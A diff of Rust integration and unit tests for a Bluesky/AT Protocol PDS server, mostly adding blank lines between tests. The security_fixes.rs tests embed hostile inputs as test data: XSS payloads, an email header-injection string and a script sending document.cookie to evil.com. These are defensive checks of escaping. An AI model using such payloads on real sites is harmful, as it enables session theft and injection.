assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
402
438
}
439
+
403
440
#[test]
404
441
fn test_validate_datetime_format_valid() {
405
442
let validator = RecordValidator::new();
···
411
448
let result = validator.validate(&post, "app.bsky.feed.post");
412
449
assert_eq!(result.unwrap(), ValidationStatus::Valid);
413
450
}
451
+
414
452
#[test]
415
453
fn test_validate_datetime_with_offset() {
416
454
let validator = RecordValidator::new();
···
422
460
let result = validator.validate(&post, "app.bsky.feed.post");
423
461
assert_eq!(result.unwrap(), ValidationStatus::Valid);
424
462
}
463
+
425
464
#[test]
426
465
fn test_validate_datetime_invalid_format() {
427
466
let validator = RecordValidator::new();
···
433
472
let result = validator.validate(&post, "app.bsky.feed.post");
434
473
assert!(matches!(result, Err(ValidationError::InvalidDatetime { .. })));
435
474
}
475
+
436
476
#[test]
437
477
fn test_validate_record_key_valid() {
438
478
assert!(validate_record_key("3k2n5j2").is_ok());
···
442
482
assert!(validate_record_key("valid~key").is_ok());
443
483
assert!(validate_record_key("self").is_ok());
444
484
}
485
+
445
486
#[test]
446
487
fn test_validate_record_key_empty() {
447
488
let result = validate_record_key("");
448
489
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
449
490
}
491
+
450
492
#[test]
451
493
fn test_validate_record_key_dot() {
452
494
assert!(validate_record_key(".").is_err());
453
495
assert!(validate_record_key("..").is_err());
454
496
}
497
+
455
498
#[test]
456
499
fn test_validate_record_key_invalid_chars() {
457
500
assert!(validate_record_key("invalid/key").is_err());
···
459
502
assert!(validate_record_key("invalid@key").is_err());
460
503
assert!(validate_record_key("invalid#key").is_err());
461
504
}
505
+
462
506
#[test]
463
507
fn test_validate_record_key_too_long() {
464
508
let long_key = "k".repeat(513);
465
509
let result = validate_record_key(&long_key);
466
510
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
467
511
}
512
+
468
513
#[test]
469
514
fn test_validate_record_key_at_max_length() {
470
515
let max_key = "k".repeat(512);
471
516
assert!(validate_record_key(&max_key).is_ok());
472
517
}
518
+
473
519
#[test]
474
520
fn test_validate_collection_nsid_valid() {
475
521
assert!(validate_collection_nsid("app.bsky.feed.post").is_ok());
···
477
523
assert!(validate_collection_nsid("a.b.c").is_ok());
478
524
assert!(validate_collection_nsid("my-app.domain.record-type").is_ok());
479
525
}
526
+
480
527
#[test]
481
528
fn test_validate_collection_nsid_empty() {
482
529
let result = validate_collection_nsid("");
483
530
assert!(matches!(result, Err(ValidationError::InvalidRecord(_))));
484
531
}
532
+
485
533
#[test]
486
534
fn test_validate_collection_nsid_too_few_segments() {
487
535
assert!(validate_collection_nsid("a").is_err());
488
536
assert!(validate_collection_nsid("a.b").is_err());
489
537
}
538
+
490
539
#[test]
491
540
fn test_validate_collection_nsid_empty_segment() {
492
541
assert!(validate_collection_nsid("a..b.c").is_err());
493
542
assert!(validate_collection_nsid(".a.b.c").is_err());
494
543
assert!(validate_collection_nsid("a.b.c.").is_err());
495
544
}
545
+
496
546
#[test]
497
547
fn test_validate_collection_nsid_invalid_chars() {
498
548
assert!(validate_collection_nsid("a.b.c/d").is_err());
499
549
assert!(validate_collection_nsid("a.b.c_d").is_err());
500
550
assert!(validate_collection_nsid("a.b.c@d").is_err());
501
551
}
552
+
502
553
#[test]
503
554
fn test_validate_threadgate() {
504
555
let validator = RecordValidator::new();
···
510
561
let result = validator.validate(&gate, "app.bsky.feed.threadgate");
511
562
assert_eq!(result.unwrap(), ValidationStatus::Valid);
512
563
}
564
+
513
565
#[test]
514
566
fn test_validate_labeler_service() {
515
567
let validator = RecordValidator::new();
···
523
575
let result = validator.validate(&labeler, "app.bsky.labeler.service");
524
576
assert_eq!(result.unwrap(), ValidationStatus::Valid);
525
577
}
578
+
526
579
#[test]
527
580
fn test_validate_list_item() {
528
581
let validator = RecordValidator::new();
+6
tests/repo_batch.rs
+6
tests/repo_batch.rs
···
3
3
use chrono::Utc;
4
4
use reqwest::StatusCode;
5
5
use serde_json::{Value, json};
6
+
6
7
#[tokio::test]
7
8
async fn test_apply_writes_create() {
8
9
let client = client();
···
50
51
assert!(results[0]["uri"].is_string());
51
52
assert!(results[0]["cid"].is_string());
52
53
}
54
+
53
55
#[tokio::test]
54
56
async fn test_apply_writes_update() {
55
57
let client = client();
···
108
110
assert_eq!(results.len(), 1);
109
111
assert!(results[0]["uri"].is_string());
110
112
}
113
+
111
114
#[tokio::test]
112
115
async fn test_apply_writes_delete() {
113
116
let client = client();
···
171
174
.expect("Failed to verify");
172
175
assert_eq!(get_res.status(), StatusCode::NOT_FOUND);
173
176
}
177
+
174
178
#[tokio::test]
175
179
async fn test_apply_writes_mixed_operations() {
176
180
let client = client();
···
258
262
let results = body["results"].as_array().unwrap();
259
263
assert_eq!(results.len(), 3);
260
264
}
265
+
261
266
#[tokio::test]
262
267
async fn test_apply_writes_no_auth() {
263
268
let client = client();
···
286
291
.expect("Failed to send request");
287
292
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
288
293
}
294
+
289
295
#[tokio::test]
290
296
async fn test_apply_writes_empty_writes() {
291
297
let client = client();
+6
tests/repo_blob.rs
+6
tests/repo_blob.rs
···
2
2
use common::*;
3
3
use reqwest::{StatusCode, header};
4
4
use serde_json::Value;
5
+
5
6
#[tokio::test]
6
7
async fn test_upload_blob_no_auth() {
7
8
let client = client();
···
19
20
let body: Value = res.json().await.expect("Response was not valid JSON");
20
21
assert_eq!(body["error"], "AuthenticationRequired");
21
22
}
23
+
22
24
#[tokio::test]
23
25
async fn test_upload_blob_success() {
24
26
let client = client();
···
38
40
let body: Value = res.json().await.expect("Response was not valid JSON");
39
41
assert!(body["blob"]["ref"]["$link"].as_str().is_some());
40
42
}
43
+
41
44
#[tokio::test]
42
45
async fn test_upload_blob_bad_token() {
43
46
let client = client();
···
56
59
let body: Value = res.json().await.expect("Response was not valid JSON");
57
60
assert_eq!(body["error"], "AuthenticationFailed");
58
61
}
62
+
59
63
#[tokio::test]
60
64
async fn test_upload_blob_unsupported_mime_type() {
61
65
let client = client();
···
73
77
.expect("Failed to send request");
74
78
assert_eq!(res.status(), StatusCode::OK);
75
79
}
80
+
76
81
#[tokio::test]
77
82
async fn test_list_missing_blobs() {
78
83
let client = client();
···
90
95
let body: Value = res.json().await.expect("Response was not valid JSON");
91
96
assert!(body["blobs"].is_array());
92
97
}
98
+
93
99
#[tokio::test]
94
100
async fn test_list_missing_blobs_no_auth() {
95
101
let client = client();
+39
tests/security_fixes.rs
+39
tests/security_fixes.rs
···
4
4
};
5
5
use bspds::oauth::templates::{login_page, error_page, success_page};
6
6
use bspds::image::{ImageProcessor, ImageError};
7
+
7
8
#[test]
8
9
fn test_sanitize_header_value_removes_crlf() {
9
10
let malicious = "Injected\r\nBcc: attacker@evil.com";
···
13
14
assert!(sanitized.contains("Injected"), "Original content should be preserved");
14
15
assert!(sanitized.contains("Bcc:"), "Text after newline should be on same line (no header injection)");
15
16
}
17
+
16
18
#[test]
17
19
fn test_sanitize_header_value_preserves_content() {
18
20
let normal = "Normal Subject Line";
19
21
let sanitized = sanitize_header_value(normal);
20
22
assert_eq!(sanitized, "Normal Subject Line");
21
23
}
24
+
22
25
#[test]
23
26
fn test_sanitize_header_value_trims_whitespace() {
24
27
let padded = " Subject ";
25
28
let sanitized = sanitize_header_value(padded);
26
29
assert_eq!(sanitized, "Subject");
27
30
}
31
+
28
32
#[test]
29
33
fn test_sanitize_header_value_handles_multiple_newlines() {
30
34
let input = "Line1\r\nLine2\nLine3\rLine4";
···
34
38
assert!(sanitized.contains("Line1"), "Content before newlines preserved");
35
39
assert!(sanitized.contains("Line4"), "Content after newlines preserved");
36
40
}
41
+
37
42
#[test]
38
43
fn test_email_header_injection_sanitization() {
39
44
let header_injection = "Normal Subject\r\nBcc: attacker@evil.com\r\nX-Injected: value";
···
44
49
assert!(sanitized.contains("Bcc:"), "Content after CRLF preserved as same line text");
45
50
assert!(sanitized.contains("X-Injected:"), "All content on same line");
46
51
}
52
+
47
53
#[test]
48
54
fn test_valid_phone_number_accepts_correct_format() {
49
55
assert!(is_valid_phone_number("+1234567890"));
···
52
58
assert!(is_valid_phone_number("+4915123456789"));
53
59
assert!(is_valid_phone_number("+1"));
54
60
}
61
+
55
62
#[test]
56
63
fn test_valid_phone_number_rejects_missing_plus() {
57
64
assert!(!is_valid_phone_number("1234567890"));
58
65
assert!(!is_valid_phone_number("12025551234"));
59
66
}
67
+
60
68
#[test]
61
69
fn test_valid_phone_number_rejects_empty() {
62
70
assert!(!is_valid_phone_number(""));
63
71
}
72
+
64
73
#[test]
65
74
fn test_valid_phone_number_rejects_just_plus() {
66
75
assert!(!is_valid_phone_number("+"));
67
76
}
77
+
68
78
#[test]
69
79
fn test_valid_phone_number_rejects_too_long() {
70
80
assert!(!is_valid_phone_number("+12345678901234567890123"));
71
81
}
82
+
72
83
#[test]
73
84
fn test_valid_phone_number_rejects_letters() {
74
85
assert!(!is_valid_phone_number("+abc123"));
75
86
assert!(!is_valid_phone_number("+1234abc"));
76
87
assert!(!is_valid_phone_number("+a"));
77
88
}
89
+
78
90
#[test]
79
91
fn test_valid_phone_number_rejects_spaces() {
80
92
assert!(!is_valid_phone_number("+1234 5678"));
81
93
assert!(!is_valid_phone_number("+ 1234567890"));
82
94
assert!(!is_valid_phone_number("+1 "));
83
95
}
96
+
84
97
#[test]
85
98
fn test_valid_phone_number_rejects_special_chars() {
86
99
assert!(!is_valid_phone_number("+123-456-7890"));
87
100
assert!(!is_valid_phone_number("+1(234)567890"));
88
101
assert!(!is_valid_phone_number("+1.234.567.890"));
89
102
}
103
+
90
104
#[test]
91
105
fn test_signal_recipient_command_injection_blocked() {
92
106
let malicious_inputs = vec![
···
103
117
assert!(!is_valid_phone_number(input), "Malicious input '{}' should be rejected", input);
104
118
}
105
119
}
120
+
106
121
#[test]
107
122
fn test_image_file_size_limit_enforced() {
108
123
let processor = ImageProcessor::new();
···
119
134
Ok(_) => panic!("Should reject files over size limit"),
120
135
}
121
136
}
137
+
122
138
#[test]
123
139
fn test_image_file_size_limit_configurable() {
124
140
let processor = ImageProcessor::new().with_max_file_size(1024);
···
126
142
let result = processor.process(&data, "image/jpeg");
127
143
assert!(result.is_err(), "Should reject files over configured limit");
128
144
}
145
+
129
146
#[test]
130
147
fn test_oauth_template_xss_escaping_client_id() {
131
148
let malicious_client_id = "<script>alert('xss')</script>";
···
133
150
assert!(!html.contains("<script>"), "Script tags should be escaped");
134
151
assert!(html.contains("<script>"), "HTML entities should be used for escaping");
135
152
}
153
+
136
154
#[test]
137
155
fn test_oauth_template_xss_escaping_client_name() {
138
156
let malicious_client_name = "<img src=x onerror=alert('xss')>";
···
140
158
assert!(!html.contains("<img "), "IMG tags should be escaped");
141
159
assert!(html.contains("<img"), "IMG tag should be escaped as HTML entity");
142
160
}
161
+
143
162
#[test]
144
163
fn test_oauth_template_xss_escaping_scope() {
145
164
let malicious_scope = "\"><script>alert('xss')</script>";
146
165
let html = login_page("client123", None, Some(malicious_scope), "test-uri", None, None);
147
166
assert!(!html.contains("<script>"), "Script tags in scope should be escaped");
148
167
}
168
+
149
169
#[test]
150
170
fn test_oauth_template_xss_escaping_error_message() {
151
171
let malicious_error = "<script>document.location='http://evil.com?c='+document.cookie</script>";
152
172
let html = login_page("client123", None, None, "test-uri", Some(malicious_error), None);
153
173
assert!(!html.contains("<script>"), "Script tags in error should be escaped");
154
174
}
175
+
155
176
#[test]
156
177
fn test_oauth_template_xss_escaping_login_hint() {
157
178
let malicious_hint = "\" onfocus=\"alert('xss')\" autofocus=\"";
···
159
180
assert!(!html.contains("onfocus=\"alert"), "Event handlers should be escaped in login hint");
160
181
assert!(html.contains("""), "Quotes should be escaped");
161
182
}
183
+
162
184
#[test]
163
185
fn test_oauth_template_xss_escaping_request_uri() {
164
186
let malicious_uri = "\" onmouseover=\"alert('xss')\"";
165
187
let html = login_page("client123", None, None, malicious_uri, None, None);
166
188
assert!(!html.contains("onmouseover=\"alert"), "Event handlers should be escaped in request_uri");
167
189
}
190
+
168
191
#[test]
169
192
fn test_oauth_error_page_xss_escaping() {
170
193
let malicious_error = "<script>steal()</script>";
···
173
196
assert!(!html.contains("<script>"), "Script tags should be escaped in error page");
174
197
assert!(!html.contains("<img "), "IMG tags should be escaped in error page");
175
198
}
199
+
176
200
#[test]
177
201
fn test_oauth_success_page_xss_escaping() {
178
202
let malicious_name = "<script>steal_session()</script>";
179
203
let html = success_page(Some(malicious_name));
180
204
assert!(!html.contains("<script>"), "Script tags should be escaped in success page");
181
205
}
206
+
182
207
#[test]
183
208
fn test_oauth_template_no_javascript_urls() {
184
209
let html = login_page("client123", None, None, "test-uri", None, None);
···
188
213
let success_html = success_page(None);
189
214
assert!(!success_html.contains("javascript:"), "Success page should not contain javascript: URLs");
190
215
}
216
+
191
217
#[test]
192
218
fn test_oauth_template_form_action_safe() {
193
219
let malicious_uri = "javascript:alert('xss')//";
194
220
let html = login_page("client123", None, None, malicious_uri, None, None);
195
221
assert!(html.contains("action=\"/oauth/authorize\""), "Form action should be fixed URL");
196
222
}
223
+
197
224
#[test]
198
225
fn test_send_error_types_have_display() {
199
226
let timeout = SendError::Timeout;
···
203
230
assert!(!format!("{}", max_retries).is_empty());
204
231
assert!(!format!("{}", invalid_recipient).is_empty());
205
232
}
233
+
206
234
#[test]
207
235
fn test_send_error_timeout_message() {
208
236
let error = SendError::Timeout;
209
237
let msg = format!("{}", error);
210
238
assert!(msg.to_lowercase().contains("timeout"), "Timeout error should mention timeout");
211
239
}
240
+
212
241
#[test]
213
242
fn test_send_error_max_retries_includes_detail() {
214
243
let error = SendError::MaxRetriesExceeded("Server returned 503".to_string());
215
244
let msg = format!("{}", error);
216
245
assert!(msg.contains("503") || msg.contains("retries"), "MaxRetriesExceeded should include context");
217
246
}
247
+
218
248
#[tokio::test]
219
249
async fn test_check_signup_queue_accepts_session_jwt() {
220
250
use common::{base_url, client, create_account_and_login};
···
231
261
let body: serde_json::Value = res.json().await.unwrap();
232
262
assert_eq!(body["activated"], true);
233
263
}
264
+
234
265
#[tokio::test]
235
266
async fn test_check_signup_queue_no_auth() {
236
267
use common::{base_url, client};
···
245
276
let body: serde_json::Value = res.json().await.unwrap();
246
277
assert_eq!(body["activated"], true);
247
278
}
279
+
248
280
#[test]
249
281
fn test_html_escape_ampersand() {
250
282
let html = login_page("client&test", None, None, "test-uri", None, None);
251
283
assert!(html.contains("&"), "Ampersand should be escaped");
252
284
assert!(!html.contains("client&test"), "Raw ampersand should not appear in output");
253
285
}
286
+
254
287
#[test]
255
288
fn test_html_escape_quotes() {
256
289
let html = login_page("client\"test'more", None, None, "test-uri", None, None);
257
290
assert!(html.contains(""") || html.contains("""), "Double quotes should be escaped");
258
291
assert!(html.contains("'") || html.contains("'"), "Single quotes should be escaped");
259
292
}
293
+
260
294
#[test]
261
295
fn test_html_escape_angle_brackets() {
262
296
let html = login_page("client<test>more", None, None, "test-uri", None, None);
···
264
298
assert!(html.contains(">"), "Greater than should be escaped");
265
299
assert!(!html.contains("<test>"), "Raw angle brackets should not appear");
266
300
}
301
+
267
302
#[test]
268
303
fn test_oauth_template_preserves_safe_content() {
269
304
let html = login_page("my-safe-client", Some("My Safe App"), Some("read write"), "valid-uri", None, Some("user@example.com"));
···
271
306
assert!(html.contains("read write") || html.contains("read"), "Scope should be preserved");
272
307
assert!(html.contains("user@example.com"), "Login hint should be preserved");
273
308
}
309
+
274
310
#[test]
275
311
fn test_csrf_like_input_value_protection() {
276
312
let malicious = "\" onclick=\"alert('csrf')";
277
313
let html = login_page("client", None, None, malicious, None, None);
278
314
assert!(!html.contains("onclick=\"alert"), "Event handlers should not be executable");
279
315
}
316
+
280
317
#[test]
281
318
fn test_unicode_handling_in_templates() {
282
319
let unicode_client = "客户端 クライアント";
283
320
let html = login_page(unicode_client, None, None, "test-uri", None, None);
284
321
assert!(html.contains("客户端") || html.contains("&#"), "Unicode should be preserved or encoded");
285
322
}
323
+
286
324
#[test]
287
325
fn test_null_byte_in_input() {
288
326
let with_null = "client\0id";
289
327
let sanitized = sanitize_header_value(with_null);
290
328
assert!(sanitized.contains("client"), "Content before null should be preserved");
291
329
}
330
+
292
331
#[test]
293
332
fn test_very_long_input_handling() {
294
333
let long_input = "x".repeat(10000);
+17
tests/server.rs
+17
tests/server.rs
···
4
4
use helpers::verify_new_account;
5
5
use reqwest::StatusCode;
6
6
use serde_json::{Value, json};
7
+
7
8
#[tokio::test]
8
9
async fn test_health() {
9
10
let client = client();
···
15
16
assert_eq!(res.status(), StatusCode::OK);
16
17
assert_eq!(res.text().await.unwrap(), "OK");
17
18
}
19
+
18
20
#[tokio::test]
19
21
async fn test_describe_server() {
20
22
let client = client();
···
30
32
let body: Value = res.json().await.expect("Response was not valid JSON");
31
33
assert!(body.get("availableUserDomains").is_some());
32
34
}
35
+
33
36
#[tokio::test]
34
37
async fn test_create_session() {
35
38
let client = client();
···
69
72
let body: Value = res.json().await.expect("Response was not valid JSON");
70
73
assert!(body.get("accessJwt").is_some());
71
74
}
75
+
72
76
#[tokio::test]
73
77
async fn test_create_session_missing_identifier() {
74
78
let client = client();
···
90
94
res.status()
91
95
);
92
96
}
97
+
93
98
#[tokio::test]
94
99
async fn test_create_account_invalid_handle() {
95
100
let client = client();
···
113
118
"Expected 400 for invalid handle chars"
114
119
);
115
120
}
121
+
116
122
#[tokio::test]
117
123
async fn test_get_session() {
118
124
let client = client();
···
127
133
.expect("Failed to send request");
128
134
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
129
135
}
136
+
130
137
#[tokio::test]
131
138
async fn test_refresh_session() {
132
139
let client = client();
···
188
195
assert_ne!(body["accessJwt"].as_str().unwrap(), access_jwt);
189
196
assert_ne!(body["refreshJwt"].as_str().unwrap(), refresh_jwt);
190
197
}
198
+
191
199
#[tokio::test]
192
200
async fn test_delete_session() {
193
201
let client = client();
···
202
210
.expect("Failed to send request");
203
211
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
204
212
}
213
+
205
214
#[tokio::test]
206
215
async fn test_get_service_auth_success() {
207
216
let client = client();
···
230
239
assert_eq!(claims["sub"], did);
231
240
assert_eq!(claims["aud"], "did:web:example.com");
232
241
}
242
+
233
243
#[tokio::test]
234
244
async fn test_get_service_auth_with_lxm() {
235
245
let client = client();
···
255
265
assert_eq!(claims["iss"], did);
256
266
assert_eq!(claims["lxm"], "com.atproto.repo.getRecord");
257
267
}
268
+
258
269
#[tokio::test]
259
270
async fn test_get_service_auth_no_auth() {
260
271
let client = client();
···
272
283
let body: Value = res.json().await.expect("Response was not valid JSON");
273
284
assert_eq!(body["error"], "AuthenticationRequired");
274
285
}
286
+
275
287
#[tokio::test]
276
288
async fn test_get_service_auth_missing_aud() {
277
289
let client = client();
···
287
299
.expect("Failed to send request");
288
300
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
289
301
}
302
+
290
303
#[tokio::test]
291
304
async fn test_check_account_status_success() {
292
305
let client = client();
···
308
321
assert!(body["repoRev"].is_string());
309
322
assert!(body["indexedRecords"].is_number());
310
323
}
324
+
311
325
#[tokio::test]
312
326
async fn test_check_account_status_no_auth() {
313
327
let client = client();
···
323
337
let body: Value = res.json().await.expect("Response was not valid JSON");
324
338
assert_eq!(body["error"], "AuthenticationRequired");
325
339
}
340
+
326
341
#[tokio::test]
327
342
async fn test_activate_account_success() {
328
343
let client = client();
···
338
353
.expect("Failed to send request");
339
354
assert_eq!(res.status(), StatusCode::OK);
340
355
}
356
+
341
357
#[tokio::test]
342
358
async fn test_activate_account_no_auth() {
343
359
let client = client();
···
351
367
.expect("Failed to send request");
352
368
assert_eq!(res.status(), StatusCode::UNAUTHORIZED);
353
369
}
370
+
354
371
#[tokio::test]
355
372
async fn test_deactivate_account_success() {
356
373
let client = client();
+10
tests/signing_key.rs
+10
tests/signing_key.rs
···
4
4
use serde_json::{json, Value};
5
5
use sqlx::PgPool;
6
6
use helpers::verify_new_account;
7
+
7
8
async fn get_pool() -> PgPool {
8
9
let conn_str = common::get_db_connection_string().await;
9
10
sqlx::postgres::PgPoolOptions::new()
···
12
13
.await
13
14
.expect("Failed to connect to test database")
14
15
}
16
+
15
17
#[tokio::test]
16
18
async fn test_reserve_signing_key_without_did() {
17
19
let client = common::client();
···
34
36
"Signing key should be in did:key format with multibase prefix"
35
37
);
36
38
}
39
+
37
40
#[tokio::test]
38
41
async fn test_reserve_signing_key_with_did() {
39
42
let client = common::client();
···
63
66
assert_eq!(row.did.as_deref(), Some(target_did));
64
67
assert_eq!(row.public_key_did_key, signing_key);
65
68
}
69
+
66
70
#[tokio::test]
67
71
async fn test_reserve_signing_key_stores_private_key() {
68
72
let client = common::client();
···
91
95
assert!(row.used_at.is_none(), "Reserved key should not be marked as used yet");
92
96
assert!(row.expires_at > chrono::Utc::now(), "Key should expire in the future");
93
97
}
98
+
94
99
#[tokio::test]
95
100
async fn test_reserve_signing_key_unique_keys() {
96
101
let client = common::client();
···
121
126
let key2 = body2["signingKey"].as_str().unwrap();
122
127
assert_ne!(key1, key2, "Each call should generate a unique signing key");
123
128
}
129
+
124
130
#[tokio::test]
125
131
async fn test_reserve_signing_key_is_public() {
126
132
let client = common::client();
···
140
146
"reserveSigningKey should work without authentication"
141
147
);
142
148
}
149
+
143
150
#[tokio::test]
144
151
async fn test_create_account_with_reserved_signing_key() {
145
152
let client = common::client();
···
190
197
"Reserved key should be marked as used"
191
198
);
192
199
}
200
+
193
201
#[tokio::test]
194
202
async fn test_create_account_with_invalid_signing_key() {
195
203
let client = common::client();
···
213
221
let body: Value = res.json().await.unwrap();
214
222
assert_eq!(body["error"], "InvalidSigningKey");
215
223
}
224
+
216
225
#[tokio::test]
217
226
async fn test_create_account_cannot_reuse_signing_key() {
218
227
let client = common::client();
···
268
277
.unwrap()
269
278
.contains("already used"));
270
279
}
280
+
271
281
#[tokio::test]
272
282
async fn test_reserved_key_tokens_work() {
273
283
let client = common::client();
+4
tests/sync_blob.rs
+4
tests/sync_blob.rs
···
3
3
use reqwest::StatusCode;
4
4
use reqwest::header;
5
5
use serde_json::Value;
6
+
6
7
#[tokio::test]
7
8
async fn test_list_blobs_success() {
8
9
let client = client();
···
35
36
let cids = body["cids"].as_array().unwrap();
36
37
assert!(!cids.is_empty());
37
38
}
39
+
38
40
#[tokio::test]
39
41
async fn test_list_blobs_not_found() {
40
42
let client = client();
···
52
54
let body: Value = res.json().await.expect("Response was not valid JSON");
53
55
assert_eq!(body["error"], "RepoNotFound");
54
56
}
57
+
55
58
#[tokio::test]
56
59
async fn test_get_blob_success() {
57
60
let client = client();
···
91
94
let body = res.text().await.expect("Failed to get body");
92
95
assert_eq!(body, blob_content);
93
96
}
97
+
94
98
#[tokio::test]
95
99
async fn test_get_blob_not_found() {
96
100
let client = client();
+14
tests/sync_deprecated.rs
+14
tests/sync_deprecated.rs
···
4
4
use helpers::*;
5
5
use reqwest::StatusCode;
6
6
use serde_json::Value;
7
+
7
8
#[tokio::test]
8
9
async fn test_get_head_success() {
9
10
let client = client();
···
23
24
let root = body["root"].as_str().unwrap();
24
25
assert!(root.starts_with("bafy"), "Root CID should be a CID");
25
26
}
27
+
26
28
#[tokio::test]
27
29
async fn test_get_head_not_found() {
28
30
let client = client();
···
40
42
assert_eq!(body["error"], "HeadNotFound");
41
43
assert!(body["message"].as_str().unwrap().contains("Could not find root"));
42
44
}
45
+
43
46
#[tokio::test]
44
47
async fn test_get_head_missing_param() {
45
48
let client = client();
···
53
56
.expect("Failed to send request");
54
57
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
55
58
}
59
+
56
60
#[tokio::test]
57
61
async fn test_get_head_empty_did() {
58
62
let client = client();
···
69
73
let body: Value = res.json().await.expect("Response was not valid JSON");
70
74
assert_eq!(body["error"], "InvalidRequest");
71
75
}
76
+
72
77
#[tokio::test]
73
78
async fn test_get_head_whitespace_did() {
74
79
let client = client();
···
83
88
.expect("Failed to send request");
84
89
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
85
90
}
91
+
86
92
#[tokio::test]
87
93
async fn test_get_head_changes_after_record_create() {
88
94
let client = client();
···
112
118
let head2 = body2["root"].as_str().unwrap().to_string();
113
119
assert_ne!(head1, head2, "Head CID should change after record creation");
114
120
}
121
+
115
122
#[tokio::test]
116
123
async fn test_get_checkout_success() {
117
124
let client = client();
···
137
144
assert!(!body.is_empty(), "CAR file should not be empty");
138
145
assert!(body.len() > 50, "CAR file should contain actual data");
139
146
}
147
+
140
148
#[tokio::test]
141
149
async fn test_get_checkout_not_found() {
142
150
let client = client();
···
153
161
let body: Value = res.json().await.expect("Response was not valid JSON");
154
162
assert_eq!(body["error"], "RepoNotFound");
155
163
}
164
+
156
165
#[tokio::test]
157
166
async fn test_get_checkout_missing_param() {
158
167
let client = client();
···
166
175
.expect("Failed to send request");
167
176
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
168
177
}
178
+
169
179
#[tokio::test]
170
180
async fn test_get_checkout_empty_did() {
171
181
let client = client();
···
180
190
.expect("Failed to send request");
181
191
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
182
192
}
193
+
183
194
#[tokio::test]
184
195
async fn test_get_checkout_empty_repo() {
185
196
let client = client();
···
197
208
let body = res.bytes().await.expect("Failed to get body");
198
209
assert!(!body.is_empty(), "Even empty repo should return CAR header");
199
210
}
211
+
200
212
#[tokio::test]
201
213
async fn test_get_checkout_includes_multiple_records() {
202
214
let client = client();
···
218
230
let body = res.bytes().await.expect("Failed to get body");
219
231
assert!(body.len() > 500, "CAR file with 5 records should be larger");
220
232
}
233
+
221
234
#[tokio::test]
222
235
async fn test_get_head_matches_latest_commit() {
223
236
let client = client();
···
246
259
let latest_cid = latest_body["cid"].as_str().unwrap();
247
260
assert_eq!(head_root, latest_cid, "getHead root should match getLatestCommit cid");
248
261
}
262
+
249
263
#[tokio::test]
250
264
async fn test_get_checkout_car_header_valid() {
251
265
let client = client();
+18
tests/sync_repo.rs
+18
tests/sync_repo.rs
···
5
5
use reqwest::StatusCode;
6
6
use reqwest::header;
7
7
use serde_json::{Value, json};
8
+
8
9
#[tokio::test]
9
10
async fn test_get_latest_commit_success() {
10
11
let client = client();
···
24
25
assert!(body["cid"].is_string());
25
26
assert!(body["rev"].is_string());
26
27
}
28
+
27
29
#[tokio::test]
28
30
async fn test_get_latest_commit_not_found() {
29
31
let client = client();
···
41
43
let body: Value = res.json().await.expect("Response was not valid JSON");
42
44
assert_eq!(body["error"], "RepoNotFound");
43
45
}
46
+
44
47
#[tokio::test]
45
48
async fn test_get_latest_commit_missing_param() {
46
49
let client = client();
···
54
57
.expect("Failed to send request");
55
58
assert_eq!(res.status(), StatusCode::BAD_REQUEST);
56
59
}
60
+
57
61
#[tokio::test]
58
62
async fn test_list_repos() {
59
63
let client = client();
···
76
80
assert!(repo["head"].is_string());
77
81
assert!(repo["active"].is_boolean());
78
82
}
83
+
79
84
#[tokio::test]
80
85
async fn test_list_repos_with_limit() {
81
86
let client = client();
···
97
102
let repos = body["repos"].as_array().unwrap();
98
103
assert!(repos.len() <= 2);
99
104
}
105
+
100
106
#[tokio::test]
101
107
async fn test_list_repos_pagination() {
102
108
let client = client();
···
135
141
assert_ne!(repos[0]["did"], repos2[0]["did"]);
136
142
}
137
143
}
144
+
138
145
#[tokio::test]
139
146
async fn test_get_repo_status_success() {
140
147
let client = client();
···
155
162
assert_eq!(body["active"], true);
156
163
assert!(body["rev"].is_string());
157
164
}
165
+
158
166
#[tokio::test]
159
167
async fn test_get_repo_status_not_found() {
160
168
let client = client();
···
172
180
let body: Value = res.json().await.expect("Response was not valid JSON");
173
181
assert_eq!(body["error"], "RepoNotFound");
174
182
}
183
+
175
184
#[tokio::test]
176
185
async fn test_notify_of_update() {
177
186
let client = client();
···
187
196
.expect("Failed to send request");
188
197
assert_eq!(res.status(), StatusCode::OK);
189
198
}
199
+
190
200
#[tokio::test]
191
201
async fn test_request_crawl() {
192
202
let client = client();
···
202
212
.expect("Failed to send request");
203
213
assert_eq!(res.status(), StatusCode::OK);
204
214
}
215
+
205
216
#[tokio::test]
206
217
async fn test_get_repo_success() {
207
218
let client = client();
···
245
256
let body = res.bytes().await.expect("Failed to get body");
246
257
assert!(!body.is_empty());
247
258
}
259
+
248
260
#[tokio::test]
249
261
async fn test_get_repo_not_found() {
250
262
let client = client();
···
262
274
let body: Value = res.json().await.expect("Response was not valid JSON");
263
275
assert_eq!(body["error"], "RepoNotFound");
264
276
}
277
+
265
278
#[tokio::test]
266
279
async fn test_get_record_sync_success() {
267
280
let client = client();
···
312
325
let body = res.bytes().await.expect("Failed to get body");
313
326
assert!(!body.is_empty());
314
327
}
328
+
315
329
#[tokio::test]
316
330
async fn test_get_record_sync_not_found() {
317
331
let client = client();
···
334
348
let body: Value = res.json().await.expect("Response was not valid JSON");
335
349
assert_eq!(body["error"], "RecordNotFound");
336
350
}
351
+
337
352
#[tokio::test]
338
353
async fn test_get_blocks_success() {
339
354
let client = client();
···
369
384
Some("application/vnd.ipld.car")
370
385
);
371
386
}
387
+
372
388
#[tokio::test]
373
389
async fn test_get_blocks_not_found() {
374
390
let client = client();
···
383
399
.expect("Failed to send request");
384
400
assert_eq!(res.status(), StatusCode::NOT_FOUND);
385
401
}
402
+
386
403
#[tokio::test]
387
404
async fn test_sync_record_lifecycle() {
388
405
let client = client();
···
491
508
"Second post should still be accessible"
492
509
);
493
510
}
511
+
494
512
#[tokio::test]
495
513
async fn test_sync_repo_export_lifecycle() {
496
514
let client = client();
+3
tests/verify_live_commit.rs
+3
tests/verify_live_commit.rs
···
3
3
use std::collections::HashMap;
4
4
use std::str::FromStr;
5
5
mod common;
6
+
6
7
#[tokio::test]
7
8
